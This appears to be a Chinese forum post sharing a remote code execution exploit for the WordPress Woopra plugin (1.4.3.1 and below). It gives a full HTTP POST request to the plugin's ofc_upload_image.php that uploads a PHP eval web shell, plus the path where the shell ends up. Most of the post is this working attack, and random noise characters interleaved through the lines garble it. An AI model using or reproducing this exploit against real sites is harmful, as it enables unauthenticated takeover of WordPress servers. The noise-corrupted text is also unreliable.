照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/ , Q5 E8 c1 \* E8 }! d' F
此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip 1 h* z0 p+ B! K1 b& _. ^, L
exp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
, `- f7 I2 R/ K/ f+ M) I/ A3 aHost: ha.cker.in
3 U2 Z6 H* c! s; V5 I1 w; g+ U1 OProxy-Connection: keep-alive) ~2 ~4 w+ F# P3 E0 J9 \
Cache-Control: max-age=08 {8 S% I% s5 X# B/ ], E: G& T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
( o% j" l$ V4 a, l2 RUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
! J; _0 S9 l+ w0 Z' p4 iAccept-Encoding: gzip,deflate,sdch% m# Y+ Z: v7 V# X
Accept-Language: zh-CN,zh;q=0.8
r' N9 q& m/ F+ U- Q! x* tContent-Length: 28 <?php eval($_POST['cmd']); ?> ) l S% S+ o# b7 I [$ v% K5 h8 y
上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
1 q3 [" c5 C [: H1 w |